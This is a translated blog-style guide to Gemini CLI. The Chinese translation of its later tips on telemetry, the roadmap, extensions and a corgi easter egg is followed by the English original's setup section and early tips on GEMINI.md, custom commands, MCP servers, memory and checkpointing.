提示： 关注 GitHub Actions 日志中 Action 的输出以保持透明度。Gemini CLI Action 日志会显示它运行了什么提示以及做出了或建议了什么更改。这既能建立信任，也能帮助您优化其行为。此外，团队还在 Action 中内置了企业级安全保障 - 例如，您可以要求 AI 在工作流中尝试运行的所有 shell 命令都必须经过您的允许列表批准。所以即使在严肃的项目中也不要犹豫使用它。

如果您使用 Gemini CLI 想出了一个很酷的自定义工作流，考虑将其贡献回社区 - 项目欢迎在他们的仓库中提出新想法！

Tip 26: Enable Telemetry for Metrics and Observability

快速应用场景： 通过启用内置的 OpenTelemetry 仪表化来深入了解 Gemini CLI 的使用情况和性能表现 - 监控 AI 会话的指标、日志和追踪，分析使用模式或排除问题。

对于喜欢测量和优化的开发者来说，Gemini CLI 提供了一个可观测性功能，可以揭示内部发生的情况。通过利用 OpenTelemetry (OTEL)，Gemini CLI 可以上报关于您会话的结构化遥测数据。这包括指标（如使用的令牌数量、响应延迟）、所采取操作的日志，甚至工具调用的追踪。

启用遥测后，您可以回答诸如：我最常使用哪个自定义命令？本周 AI 在这个项目中编辑文件的次数是多少？当我要求 CLI 运行测试时的平均响应时间是多少？这类数据对于理解使用模式和性能至关重要。团队可以用它来查看开发者如何与 AI 助手交互，以及可能存在的瓶颈在哪里。

By default, telemetry is off (Gemini respects privacy and performance). You can opt in by setting "telemetry.enabled": true in settings.json or by launching Gemini CLI with the --telemetry flag. You can also choose where telemetry goes: it can be logged locally or sent to a backend such as Google Cloud.

For a quick start, set "telemetry.target": "local". Gemini will then simply write telemetry to a local file (by default) or to a custom path you specify via outfile. Local telemetry includes JSON logs that you can parse or feed into other tools.

For more robust monitoring, set "target": "gcp" (Google Cloud), or integrate with other OpenTelemetry-compatible systems such as Jaeger or Datadog. Gemini CLI's OTEL support is vendor-neutral: you can export data to almost any observability stack you prefer (Google Cloud Operations, Prometheus, and so on).

Google 为 Cloud 提供了简化的路径：如果您指向 GCP，CLI 可以直接将数据发送到您项目中的 Cloud Logging 和 Cloud Monitoring，在那里您可以使用通常的仪表板和警报工具。

您能获得什么样的洞察？遥测捕获诸如工具执行、错误和重要里程碑等事件。它还记录指标，如提示处理时间和每个提示的令牌计数。

对于使用分析，您可以聚合团队中每个斜杠命令的使用次数，或代码生成被调用的频率。对于性能监控，您可以跟踪响应是否变慢，这可能表明达到 API 速率限制或模型更改。对于调试，您可以看到工具抛出的错误或异常（例如，run_shell_command 失败）随上下文一起记录。

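If you send this data to a platform such as Google Cloud Monitoring, all of it can be visualized. For example, you can build dashboards for "tokens used per day" or "error rate of tool X". It essentially gives you a window into the AI's "brain" and your own usage, which is especially helpful in enterprise settings for making sure everything runs smoothly.

Enabling telemetry does add some overhead (extra data processing), so you may not want it on all the time for personal use. It is, however, very useful for debugging sessions or occasional health checks. One approach is to enable it on a CI server or in a team's shared environment to collect statistics, and leave it off locally unless needed. Remember that you can toggle it at any time: update the settings, reload with /memory refresh if needed, or restart Gemini CLI with the --telemetry flag.

All telemetry remains under your control: it respects the environment variables you set for endpoints and credentials, so data goes only where you intend. This feature turns Gemini CLI from a black box into an observatory, showing how the AI agent interacts with your world so that you can keep improving that interaction.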

提示： 如果您只是想快速查看当前会话的统计信息（而不需要完整的遥测），使用 /stats 命令。它会在 CLI 中直接输出令牌使用量和会话长度等指标。这是查看即时数据的轻量级方法。但对于长期或多会话分析，遥测是正确的选择。如果您将遥测发送到云项目，考虑设置仪表板或警报（例如，如果错误率激增或令牌使用量达到阈值则警报） - 这可以主动捕获 Gemini CLI 在您团队中使用时出现的问题。

Tip 27: Keep an Eye on the Roadmap (Background Agents and More)

快速使用场景： 及时了解即将推出的 Gemini CLI 功能——通过关注公共的 Gemini CLI 路线图，你可以在主要计划的增强功能（如用于长时间运行任务的后台代理）到达之前就了解它们，让你能够进行规划并提供反馈。

Gemini CLI 正在快速发展，新版本频繁发布，因此关注其未来规划是明智的选择。Google 在 GitHub 上维护着 Gemini CLI 的公开路线图，详细说明了近期重点关注的领域和目标功能。这基本上是一份活文档（以及相关 issue 集合），你可以从中看到开发者的工作重点和即将推出的功能。例如，路线图中一个令人期待的项目是后台代理支持——即能够生成在后台运行的自主代理，持续处理任务或异步执行工作。根据路线图讨论，这些后台代理将让你把长时间运行的任务委托给 Gemini CLI，而不会占用你的交互会话。比如，你可以启动一个后台代理来监控项目的特定事件，或者定期执行任务，无论是在本地机器上还是通过部署到 Cloud Run 等服务来实现。该功能旨在直接从 CLI”启用长时间运行的自主任务和主动辅助”，实质上是将 Gemini CLI 的实用性扩展到即时查询之外的场景。

通过关注路线图，你还能了解到其他规划中的功能。这些可能包括新的工具集成、对其他 Gemini 模型版本的支持、UI/UX 改进等等。路线图通常按”领域”组织（例如扩展性、模型、后台等），并经常标注里程碑（如目标交付季度）。这并不能保证某功能的具体发布时间，但能让你很好地了解团队的优先事项。

由于该项目是开源的，你甚至可以深入查看每个路线图项目链接的 GitHub issue，了解设计提案和进展。对于依赖 Gemini CLI 的开发者来说，这种透明度意味着你可以预见变化——也许是某个 API 正在添加你需要的功能，或者即将有破坏性变更，让你能够提前做好准备。

关注路线图很简单，收藏 GitHub 项目看板或标记为”路线图”的 issue，并定期查看。一些重大更新（如扩展功能或 IDE 集成的引入）在正式发布前都在路线图中有所暗示，所以你能提前一窥究竟。此外，Gemini CLI 团队经常鼓励社区对这些未来功能提供反馈。如果你对后台代理等功能有想法或使用案例，通常可以在相关的 issue 或讨论线程中留言，从而影响其开发方向。

提示：由于 Gemini CLI 是开源项目（采用 Apache 2.0 许可证），你不仅可以关注路线图，还可以参与其中！维护者欢迎贡献，特别是与路线图一致的项目。如果你真的关心某个功能，可以考虑在预览阶段贡献代码或进行测试。如果你需要的功能尚未出现在路线图中，你可以提出功能请求。路线图页面本身就提供了如何提议变更的指导。参与项目不仅让你保持信息同步，还能让你塑造自己使用的工具。毕竟，Gemini CLI 在设计时就考虑了社区参与，许多最近的功能（如某些扩展和工具）都起源于社区建议。

Tip 28: Extend Gemini CLI with Extensions

快速用例：通过安装即插即用的插件为 Gemini CLI 添加新功能——例如集成你喜爱的数据库或云服务——无需费心就能扩展 AI 的工具集。这就像为你的 CLI 安装应用程序，教它掌握新技能。

插件是 2025 年底推出的革命性功能：它们让你能够以模块化方式自定义和扩展 Gemini CLI 的功能。插件本质上是一个配置包（可选包含代码），将 Gemini CLI 连接到外部工具或服务。例如，Google 发布了一套 Google Cloud 插件——有帮助部署应用到 Cloud Run 的，有管理 BigQuery 的，有分析应用安全的，还有更多。合作伙伴和社区开发者也为各种用途构建了插件：Dynatrace（监控）、Elastic（搜索分析）、Figma（设计资源）、Shopify、Snyk（安全扫描）、Stripe（支付）等等，而且这个名单还在不断增长。通过安装合适的插件，你立即赋予 Gemini CLI 使用新的领域特定工具的能力。其美妙之处在于，这些插件带有预定义的“操作手册”，教会 AI 如何有效使用这些新工具。这意味着一旦安装，你就可以让 Gemini CLI 执行与这些服务相关的任务，它会知道调用合适的 API 或命令，就像内置了这些知识一样。

使用插件非常简单。CLI 有专门的命令来管理它们：gemini extensions install 。通常，你提供插件的 GitHub 仓库 URL 或本地路径，CLI 就会获取并安装它。例如，要安装官方插件，你可能运行：gemini extensions install https://github.com/google-gemini/gemini-cli-extension-cloud-run。几秒钟内，插件就会添加到你的环境中（存储在 ~/.gemini/extensions/ 或你项目的 .gemini/extensions/ 文件夹下）。然后你可以通过在 CLI 中运行 /extensions 查看它，该命令会列出活跃的插件。从那时起，AI 就有了新的工具可用。如果是一个 Cloud Run 插件，你可以说”将我的应用部署到 Cloud Run”，Gemini CLI 实际上就能执行这个操作（通过插件的工具调用底层的 gcloud 命令）。本质上，插件作为 Gemini CLI 功能的一级扩展存在，但你只需要选择安装需要的那些。

围绕插件有一个开放的生态系统。Google 有一个官方插件页面列出了可用的插件，而且由于框架是开放的，任何人都可以创建和分享自己的插件。如果你有特定的内部 API 或工作流，可以为其构建插件，让 Gemini CLI 能够协助处理。编写插件比听起来更容易：通常你创建一个目录（比如 my-extension/），在其中创建 gemini-extension.json 文件，描述要添加的工具或上下文。你可以定义新的斜杠命令或指定 AI 可以调用的远程 API。无需修改 Gemini CLI 的核心——只需放入你的插件即可。CLI 被设计为在运行时加载这些插件。许多插件通过添加自定义 MCP 工具（模型上下文协议服务器或函数）来实现，AI 可以使用这些工具。例如，插件可以通过接入外部翻译 API 来添加 /translate 命令；一旦安装，AI 就知道如何使用 /translate。关键优势是模块化：你只安装需要的插件，保持 CLI 轻量，但可以选择集成几乎任何东西。

要管理插件，除了 install 命令外，你还可以通过类似的 CLI 命令更新或移除它们（gemini extensions update 或直接删除文件夹）。明智的做法是定期检查你使用的插件是否有更新，因为它们可能获得了改进。CLI 未来可能会引入”插件市场”风格的界面，但目前，探索 GitHub 仓库和官方目录是发现新插件的方式。发布时一些热门插件包括 GenAI Genkit 插件（用于构建生成式 AI 应用），以及各种 Google Cloud 插件，涵盖 CI/CD、数据库管理等领域。

提示：如果你要构建自己的插件，先从现有的插件中寻找示例。官方文档提供了插件指南，其中包含架构和功能说明。创建私有插件的一个简单方法是使用 GEMINI.md 中的 @include 功能注入脚本或上下文，但完整的插件给你更多能力（如打包工具）。此外，由于插件可以包含上下文文件，你可以用它们预加载领域知识。想象一个为你公司内部 API 创建的插件，包含 API 摘要和调用工具——AI 就会知道如何处理与该 API 相关的请求。简而言之，插件开启了一个新世界，Gemini CLI 可以与任何东西交互。关注插件市场的新增内容，不要犹豫与你创建的有用插件分享给社区——你可能帮助到成千上万的其他开发者。

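Bonus: Corgi Mode Easter Egg 🐕

Finally, this is not a productivity tip but a fun Easter egg: try the /corgi command in Gemini CLI. It toggles "corgi mode", which sends a cute corgi animation running across your terminal. It will not help you code better, but it can certainly lighten the mood during a long coding session. You will see an ASCII-art corgi dashing through the CLI interface. To turn it off, run /corgi again.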

这是团队添加的纯娱乐功能（是的，甚至有关于在柯基模式上花费开发时间的调侃讨论）。这表明开发者在工具中隐藏了一些奇思妙想。所以当你需要快速休息一下或想开心一下时，试试 /corgi 吧。🐕🎉

（传闻说可能还有其他彩蛋或模式——谁知道呢？也许是”/partyparrot”之类的。备忘单或帮助命令列出了 /corgi，所以这不是秘密，只是很少被使用。现在你也在这个笑话之中了！）

总结：

我们已经全面介绍了 Gemini CLI 的专业技巧和功能。从使用 GEMINI.md 设置持久上下文，到编写自定义命令和使用 MCP 服务器等高级工具，再到利用多模态输入和自动化工作流，这个 AI 命令行助手能做的事情非常多。作为外部开发者，你可以将 Gemini CLI 整合到日常工作中——它就像你终端中的强大盟友，能够处理繁琐任务、提供见解，甚至排查环境问题。

Gemini CLI 正在快速发展（作为开源项目，有社区贡献），新功能和改进不断涌现。通过掌握本指南中的专业技巧，你将能够充分利用这个工具的全部潜力。这不仅仅是使用 AI 模型——而是将 AI 深度整合到你的软件开发和管理方式中。

祝你在使用 Gemini CLI 时编码愉快，探索一下你的”终端中的 AI 代理”能带你走多远。

现在你手中拥有了 AI 瑞士军刀——明智地使用它，它将让你成为更高效（或许也更快乐）的开发者！

Original

This article was translated from the English-language project gemini-cli-tips on GitHub.
Repository for this translation: https://github.com/yiGmMk/gemini-cli-tips

AI|Gemini CLI Tips & Tricks

2025-12-15T16:00:00.000Z

This guide covers ~30 pro-tips for effectively using Gemini CLI for agentic coding

Gemini CLI is an open-source AI assistant that brings the power of Google’s Gemini model directly into your terminal. It functions as a conversational, “agentic” command-line tool - meaning it can reason about your requests, choose tools (like running shell commands or editing files), and execute multi-step plans to help with your development workflow.

In practical terms, Gemini CLI acts like a supercharged pair programmer and command-line assistant. It excels at coding tasks, debugging, content generation, and even system automation, all through natural language prompts. Before diving into pro tips, let’s quickly recap how to set up Gemini CLI and get it running.

Getting Started

Installation: You can install Gemini CLI via npm. For a global install, use:

npm install -g @google/gemini-cli

Or run it without installing using npx:

npx @google/gemini-cli

Gemini CLI is available on all major platforms (it’s built with Node.js/TypeScript). Once installed, simply run the gemini command in your terminal to launch the interactive CLI.

Authentication: On first use, you’ll need to authenticate with the Gemini service. You have two options: (1) Google Account Login (free tier) - this lets you use Gemini 2.5 Pro for free with generous usage limits (about 60 requests/minute and 1,000 requests per day). On launch, Gemini CLI will prompt you to sign in with a Google account (no billing required). (2) API Key (paid or higher-tier access) - you can get an API key from Google AI Studio and set the environment variable GEMINI_API_KEY to use it.

API key usage can offer higher quotas and enterprise data‑use protections; prompts aren’t used for training on paid/billed usage, though logs may be retained for safety.

For example, add to your shell profile:

export GEMINI_API_KEY="YOUR_KEY_HERE"

Basic Usage: To start an interactive session, just run gemini with no arguments. You’ll get a gemini> prompt where you can type requests or commands. For instance:

$ gemini
gemini> Create a React recipe management app using SQLite

You can then watch as Gemini CLI creates files, installs dependencies, runs tests, etc., to fulfill your request. If you prefer a one-shot invocation (non-interactive), use the -p flag with a prompt, for example:

gemini -p "Summarize the main points of the attached file. @./report.txt"

This will output a single response and exit. You can also pipe input into Gemini CLI: for example, echo "Count to 10" | gemini will feed the prompt via stdin.
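If you want to drive these non-interactive modes from a script, a thin wrapper is enough. The Python sketch below is a minimal example under stated assumptions: gemini_command and run_gemini are hypothetical helper names, and the only CLI behavior relied on is the -p flag and stdin piping described above.

```python
import subprocess


def gemini_command(prompt=None):
    """Build the argument list: `gemini -p <prompt>`, or bare `gemini` for stdin use."""
    return ["gemini"] if prompt is None else ["gemini", "-p", prompt]


def run_gemini(prompt=None, stdin_text=None):
    """Run Gemini CLI once and return its stdout as text.

    Raises CalledProcessError on a non-zero exit status, and
    FileNotFoundError if gemini is not installed.
    """
    result = subprocess.run(
        gemini_command(prompt),
        input=stdin_text,
        capture_output=True,
        text=True,
        check=True,
    )
    return result.stdout
```

For instance, run_gemini(stdin_text="Count to 10") corresponds to the echo pipeline above, while run_gemini("Summarize the README") corresponds to the -p form.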

CLI Interface: Gemini CLI provides a rich REPL-like interface. It supports slash commands (special commands prefixed with / for controlling the session, tools, and settings) and bang commands (prefixed with ! to execute shell commands directly). We’ll cover many of these in the pro tips below. By default, Gemini CLI operates in a safe mode where any action that modifies your system (writing files, running shell commands, etc.) will ask for confirmation. When a tool action is proposed, you’ll see a diff or command and be prompted (Y/n) to approve or reject it. This ensures the AI doesn’t make unwanted changes without your consent.

With the basics out of the way, let’s explore a series of pro tips and hidden features to help you get the most out of Gemini CLI. Each tip is presented with a simple example first, followed by deeper details and nuances. These tips incorporate advice and insights from the tool’s creators (e.g. Taylor Mullen) and the Google Developer Relations team, as well as the broader community, to serve as a canonical guide for power users of Gemini CLI.

Tip 1: Use `GEMINI.md` for Persistent Context

Quick use-case: Stop repeating yourself in prompts. Provide project-specific context or instructions by creating a GEMINI.md file, so the AI always has important background knowledge without being told every time.

When working on a project, you often have certain overarching details - e.g. coding style guidelines, project architecture, or important facts - that you want the AI to keep in mind. Gemini CLI allows you to encode these in one or more GEMINI.md files. Simply create a .gemini folder (if not already present) in your project, and add a Markdown file named GEMINI.md with whatever notes or instructions you want the AI to persist. For example:

# Project Phoenix - AI Assistant

- All Python code must follow PEP 8 style.  
- Use 4 spaces for indentation.  
- The user is building a data pipeline; prefer functional programming paradigms.

Place this file in your project root (or in subdirectories for more granular context). Now, whenever you run gemini in that project, it will automatically load these instructions into context. This means the model will always be primed with them, avoiding the need to prepend the same guidance to every prompt.

How it works: Gemini CLI uses a hierarchical context loading system. It will combine global context (from ~/.gemini/GEMINI.md, which you can use for cross-project defaults) with your project-specific GEMINI.md, and even context files in subfolders. More specific files override more general ones. You can inspect what context was loaded at any time by using the command:

/memory show

This will display the full combined context the AI sees. If you make changes to your GEMINI.md, use /memory refresh to reload the context without restarting the session.
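To make the general-to-specific ordering concrete, here is a simplified Python sketch of hierarchical context loading. It is an approximation, not the CLI's actual algorithm: it assumes context is simply concatenated from the global file, then the project root, then each directory down to the current one, and the function names are hypothetical.

```python
from pathlib import Path


def collect_context_files(project_root, cwd, home, name="GEMINI.md"):
    """List existing context files from most general to most specific.

    Raises ValueError if cwd is not inside project_root.
    """
    project_root = Path(project_root).resolve()
    cwd = Path(cwd).resolve()
    # Global defaults come first, then the project root.
    candidates = [Path(home) / ".gemini" / name, project_root / name]
    current = project_root
    # Then every directory on the way down to the working directory.
    for part in cwd.relative_to(project_root).parts:
        current = current / part
        candidates.append(current / name)
    return [p for p in candidates if p.is_file()]


def combined_context(files):
    """Join the files in order, so more specific notes appear last."""
    return "\n\n".join(p.read_text(encoding="utf-8") for p in files)
```

Placing the most specific file last is one simple way to let it take priority, since later instructions in a prompt tend to refine earlier ones.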

Pro Tip: Use the /init slash command to quickly generate a starter GEMINI.md. Running /init in a new project creates a template context file with information like the tech stack detected, a summary of the project, etc. You can then edit and expand that file. For large projects, consider breaking the context into multiple files and importing them into GEMINI.md with @include syntax. For example, your main GEMINI.md could have lines like @./docs/prompt-guidelines.md to pull in additional context files. This keeps your instructions organized.

With a well-crafted GEMINI.md, you essentially give Gemini CLI a “memory” of the project’s requirements and conventions. This persistent context leads to more relevant responses and less back-and-forth prompt engineering.

Tip 2: Create Custom Slash Commands

Quick use-case: Speed up repetitive tasks by defining your own slash commands. For example, you could make a command /test:gen that generates unit tests from a description, or /db:reset that drops and recreates a test database. This extends Gemini CLI’s functionality with one-liners tailored to your workflow.

Gemini CLI supports custom slash commands that you can define in simple configuration files. Under the hood, these are essentially pre-defined prompt templates. To create one, make a directory commands/ under either ~/.gemini/ for global commands or in your project’s .gemini/ folder for project-specific commands. Inside commands/, create a TOML file for each new command. The file name format determines the command name: e.g. a file test/gen.toml defines a command /test:gen.

Let’s walk through an example. Say you want a command to generate a unit test from a requirement description. You could create ~/.gemini/commands/test/gen.toml with the following content:

# Invoked as: /test:gen "Description of the test"
description = "Generates a unit test based on a requirement."
prompt = """
You are an expert test engineer. Based on the following requirement, please write a comprehensive unit test using the Jest framework.

Requirement: {{args}}
"""

Now, after reloading or restarting Gemini CLI, you can simply type:

/test:gen "Ensure the login button redirects to the dashboard upon success"

Gemini CLI will recognize /test:gen and substitute the {{args}} in your prompt template with the provided argument (in this case, the requirement). The AI will then proceed to generate a Jest unit test accordingly. The description field is optional but is used when you run /help or /tools to list available commands.
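The two mechanics at work here, mapping a file path to a command name and filling in {{args}}, can be sketched in a few lines of Python. This is an illustrative model only: command_name and render_prompt are hypothetical helpers, and the real CLI may handle edge cases differently.

```python
from pathlib import PurePosixPath


def command_name(relative_toml_path):
    """Map a path under commands/ to its slash command: test/gen.toml -> /test:gen."""
    path = PurePosixPath(relative_toml_path).with_suffix("")
    return "/" + ":".join(path.parts)


def render_prompt(template, args):
    """Substitute the user's argument text for every {{args}} placeholder."""
    return template.replace("{{args}}", args)


template = "You are an expert test engineer.\n\nRequirement: {{args}}\n"
rendered = render_prompt(template, "Ensure the login button redirects to the dashboard")
```

The rendered string is what would be sent to the model in place of the short command the user typed.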

This mechanism is extremely powerful - effectively, you can script the AI with natural language. The community has created numerous useful custom commands. For instance, Google’s DevRel team shared a set of 10 practical workflow commands (via an open-source repo) demonstrating how you can script common flows like creating API docs, cleaning data, or setting up boilerplate code. By defining a custom command, you package a complex prompt (or series of prompts) into a reusable shortcut.

Pro Tip: Custom commands can also be used to enforce formatting or apply a “persona” to the AI for certain tasks. For example, you might have a /review:security command that always prefaces the prompt with “You are a security auditor…” to review code for vulnerabilities. This approach ensures consistency in how the AI responds to specific categories of tasks.

To share commands with your team, you can commit the TOML files in your project’s repo (under .gemini/commands directory). Team members who have Gemini CLI will automatically pick up those commands when working in the project. This is a great way to standardize AI-assisted workflows across a team.

Tip 3: Extend Gemini with Your Own `MCP` Servers

Quick use-case: Suppose you want Gemini to interface with an external system or a custom tool that isn’t built-in - for example, query a proprietary database, or integrate with Figma designs. You can do this by running a custom Model Context Protocol (MCP) server and plugging it into Gemini CLI. MCP servers let you add new tools and abilities to Gemini, effectively extending the agent.

Gemini CLI comes with several MCP servers out-of-the-box (for instance, ones enabling Google Search, code execution sandboxes, etc.), and you can add your own. An MCP server is essentially an external process (it could be a local script, a microservice, or even a cloud endpoint) that speaks a simple protocol to handle tasks for Gemini. This architecture is what makes Gemini CLI so extensible.

Examples of MCP servers: Some community and Google-provided MCP integrations include a Figma MCP (to fetch design details from Figma), a Clipboard MCP (to read/write from your system clipboard), and others. In fact, in an internal demo, the Gemini CLI team showcased a “Google Docs MCP” server that allowed saving content directly to Google Docs. The idea is that whenever Gemini needs to perform an action that the built-in tools can’t handle, it can delegate to your MCP server.

How to add one: You can configure MCP servers via your settings.json or using the CLI. For a quick setup, try the CLI command:

gemini mcp add myserver --command "python3 my_mcp_server.py" --port 8080

This would register a server named “myserver” that Gemini CLI will launch by running the given command (here a Python program) on port 8080. Flag names can differ between versions, so confirm the exact syntax with gemini mcp add --help. In ~/.gemini/settings.json, it would add an entry under mcpServers. For example:

"mcpServers": {
  "myserver": {
    "command": "python3",
    "args": ["-m", "my_mcp_server", "--port", "8080"],
    "cwd": "./mcp_tools/python",
    "timeout": 15000
  }
}

This configuration (based on the official docs) tells Gemini how to start the MCP server and where. Once running, the tools provided by that server become available to Gemini CLI. You can list all MCP servers and their tools with the slash command:

/mcp

This will show any registered servers and what tool names they expose.
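If you manage settings.json from a script, registering a server amounts to adding one entry under mcpServers. The Python sketch below builds such an entry using only the keys shown in the example above (command, args, cwd, timeout); the function name add_mcp_server is hypothetical, and it works on an in-memory dict rather than touching your real settings file.

```python
import json


def add_mcp_server(settings, name, command, args, cwd=None, timeout_ms=None):
    """Return a copy of settings with an mcpServers entry added or replaced."""
    updated = dict(settings)
    servers = dict(updated.get("mcpServers", {}))
    entry = {"command": command, "args": list(args)}
    if cwd is not None:
        entry["cwd"] = cwd
    if timeout_ms is not None:
        entry["timeout"] = timeout_ms
    servers[name] = entry
    updated["mcpServers"] = servers
    return updated


# Mirrors the sample entry above, layered on an otherwise unrelated setting.
settings = add_mcp_server(
    {"theme": "GitHub"},
    "myserver",
    "python3",
    ["-m", "my_mcp_server", "--port", "8080"],
    cwd="./mcp_tools/python",
    timeout_ms=15000,
)
settings_json = json.dumps(settings, indent=2)
```

Writing settings_json back to ~/.gemini/settings.json is left out on purpose, so the sketch cannot overwrite an existing configuration.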

Power of MCP: MCP servers can provide rich, multi-modal results. For instance, a tool served via MCP could return an image or a formatted table as part of the response to Gemini CLI. They also support OAuth 2.0, so you can securely connect to APIs (like Google’s APIs, GitHub, etc.) via an MCP tool without exposing credentials. Essentially, if you can code it, you can wrap it as an MCP tool - turning Gemini CLI into a hub that orchestrates many services.

Default vs. custom: By default, Gemini CLI’s built-in tools cover a lot (reading files, web search, executing shell commands, etc.), but MCP lets you go beyond. Some advanced users have created MCP servers to interface with internal systems or to perform specialized data processing. For example, you could have a database-mcp that provides a /query_db tool for running SQL queries on a company database, or a jira-mcp to create tickets via natural language.

When creating your own, be mindful of security: by default, custom MCP tools require confirmation unless you mark them as trusted. You can control safety with settings like trust: true for a server (which auto-approves its tool actions) or by whitelisting specific safe tools and blacklisting dangerous ones.

In short, MCP servers unlock limitless integration. They’re a pro feature that lets Gemini CLI become a glue between your AI assistant and whatever system you need it to work with. If you’re interested in building one, check out the official MCP guide and community examples.

Tip 4: Leverage Memory Addition & Recall

Quick use-case: Keep important facts at your AI’s fingertips by adding them to its long-term memory. For example, after figuring out a database port or an API token, you can do:

/memory add "Our staging RabbitMQ is on port 5673"

This will store that fact so you (or the AI) don’t forget it later. You can then recall everything in memory with /memory show at any time.

The /memory commands provide a simple but powerful mechanism for persistent memory. When you use /memory add <text>, the given text is appended to your persistent context (technically, it’s saved into the global ~/.gemini/GEMINI.md file or the project’s GEMINI.md). It’s a bit like taking a note and pinning it to the AI’s virtual bulletin board. Once added, the AI will always see that note in the prompt context for future interactions, across sessions.

Consider an example: you’re debugging an issue and discover a non-obvious insight (“The config flag X_ENABLE must be set to true or the service fails to start”). If you add this to memory, later on if you or the AI are discussing a related problem, it won’t overlook this critical detail - it’s in the context.

Using /memory:

/memory add "<text>" - Add a fact or note to memory (persistent context). This updates the GEMINI.md immediately with the new entry.
/memory show - Display the full content of the memory (i.e. the combined context file that’s currently loaded).
/memory refresh - Reload the context from disk (useful if you manually edited the GEMINI.md file outside of Gemini CLI, or if multiple people are collaborating on it).
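As a rough mental model of the add/show behavior described above, here is a minimal Python sketch. It assumes memory is just a Markdown file that receives one bullet per note; the function names add_memory and show_memory are hypothetical, and the real file layout Gemini CLI uses may differ.

```python
from pathlib import Path


def add_memory(memory_file: Path, note: str) -> None:
    """Append one note as a Markdown bullet, creating the file if needed."""
    memory_file.parent.mkdir(parents=True, exist_ok=True)
    existing = memory_file.read_text(encoding="utf-8") if memory_file.exists() else ""
    # Start on a fresh line if a hand-edited file lacks a trailing newline.
    separator = "" if existing == "" or existing.endswith("\n") else "\n"
    with memory_file.open("a", encoding="utf-8") as handle:
        handle.write(f"{separator}- {note.strip()}\n")


def show_memory(memory_file: Path) -> str:
    """Return the full memory text, or an empty string if nothing is saved."""
    if not memory_file.exists():
        return ""
    return memory_file.read_text(encoding="utf-8")
```

Because the store is plain Markdown, anything appended this way stays editable by hand, which is the same property the /memory commands rely on.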

Because the memory is stored in Markdown, you can also manually edit the GEMINI.md file to curate or organize the info. The /memory commands are there for convenience during conversation, so you don’t have to open an editor.

Pro Tip: This feature is great for “decision logs.” If you decide on an approach or rule during a chat (e.g., a certain library to use, or an agreed code style), add it to memory. The AI will then recall that decision and avoid contradicting it later. It’s especially useful in long sessions that might span hours or days - by saving key points, you mitigate the model’s tendency to forget earlier context when the conversation gets long.

Another use is personal notes. Because ~/.gemini/GEMINI.md (global memory) is loaded for all sessions, you could put general preferences or information there. For example, “The user’s name is Alice. Speak politely and avoid slang.” It’s like configuring the AI’s persona or global knowledge. Just be aware that global memory applies to all projects, so don’t clutter it with project-specific info.

In summary, Memory Addition & Recall helps Gemini CLI maintain state. Think of it as a knowledge base that grows with your project. Use it to avoid repeating yourself or to remind the AI of facts it would otherwise have to rediscover from scratch.

Tip 5: Use Checkpointing and `/restore` as an Undo Button

Quick use-case: If Gemini CLI makes a series of changes to your files that you’re not happy with, you can instantly roll back to a prior state. Enable checkpointing when you start Gemini (or in settings), and use the /restore command to undo changes like a lightweight Git revert. /restore rolls back your workspace to the saved checkpoint; conversation state may be affected depending on how the checkpoint was captured.

Gemini CLI’s checkpointing feature acts as a safety net. When enabled, the CLI takes a snapshot of your project’s files before each tool execution that modifies files. If something goes wrong, you can revert to the last known good state. It’s essentially version control for the AI’s actions, without you needing to manually commit to Git each time.

How to use it: You can turn on checkpointing by launching the CLI with the --checkpointing flag:

gemini --checkpointing

Alternatively, you can make it the default by adding to your config ("checkpointing": { "enabled": true } in settings.json). Once active, you’ll notice that each time Gemini is about to write to a file, it says something like “Checkpoint saved.”

If you then realize an AI-made edit is problematic, you have two options:

Run /restore list (or just /restore with no arguments) to see a list of recent checkpoints with timestamps and descriptions.
Run /restore <id> to roll back to a specific checkpoint. If you omit the id and there’s only one pending checkpoint, it will restore that by default.

For example:

/restore

Gemini CLI might output:

0: [2025-09-22 10:30:15] Before running ‘apply_patch’
1: [2025-09-22 10:45:02] Before running ‘write_file’

You can then do /restore 0 to revert all file changes (and even the conversation context) back to how it was at that checkpoint. In this way, you can “undo” a mistaken code refactor or any other changes Gemini made.

What gets restored: The checkpoint captures the state of your working directory (all files that Gemini CLI is allowed to modify); conversation state may also be rolled back, depending on how the checkpoint was captured. When you restore, it overwrites files with their old versions and, where captured, resets the conversation memory to that snapshot. It’s like time-traveling the AI agent back to before it made the wrong turn. Note that it won’t undo external side effects (for example, if the AI ran a database migration, it can’t undo that), but anything in the file system and chat context is fair game.
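To make the snapshot-then-restore idea concrete, here is a small Python analogy. It is not how Gemini CLI implements checkpointing; it simply copies a working directory into a separate store and copies it back. The names save_checkpoint and restore_checkpoint are hypothetical, and the store is assumed to live outside the working directory.

```python
import shutil
from pathlib import Path


def save_checkpoint(workdir: Path, store: Path) -> int:
    """Copy workdir into the store and return the new checkpoint id."""
    store.mkdir(parents=True, exist_ok=True)
    checkpoint_id = sum(1 for _ in store.iterdir())  # ids are 0, 1, 2, ...
    shutil.copytree(workdir, store / str(checkpoint_id))
    return checkpoint_id


def restore_checkpoint(workdir: Path, store: Path, checkpoint_id: int) -> None:
    """Replace the contents of workdir with the chosen snapshot."""
    snapshot = store / str(checkpoint_id)
    # Remove everything created or changed since the snapshot was taken.
    for entry in workdir.iterdir():
        if entry.is_dir() and not entry.is_symlink():
            shutil.rmtree(entry)
        else:
            entry.unlink()
    shutil.copytree(snapshot, workdir, dirs_exist_ok=True)
```

Like the real feature, this only covers files: anything a command did outside the directory (a database migration, a network call) is untouched by the restore.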

Best practices: It’s a good idea to keep checkpointing on for non-trivial tasks. The overhead is small, and it provides peace of mind. If you find you don’t need a checkpoint (everything went well), you can always clear it or just let the next one overwrite it. The development team recommends using checkpointing especially before multi-step code edits. For mission-critical projects, though, you should still use a proper version control (git) as your primary safety net - consider checkpoints as a convenience for quick undo rather than a full VCS.

In essence, /restore lets you use Gemini CLI with confidence. You can let the AI attempt bold changes, knowing you have an “OH NO” button to rewind if needed.

Tip 6: Read Google Docs, Sheets, and More

With a Workspace MCP server configured, you can paste a Docs/Sheets link and have the MCP fetch it, subject to permissions.

Quick use-case: Imagine you have a Google Doc or Sheet with some specs or data that you want the AI to use. Instead of copy-pasting the content, you can provide the link, and with a configured Workspace MCP server Gemini CLI can fetch and read it.

For example:

Summarize the requirements from this design doc: https://docs.google.com/document/d/<id>

Gemini can pull in the content of that Doc and incorporate it into its response. Similarly, it can read Google Sheets or Drive files by link.

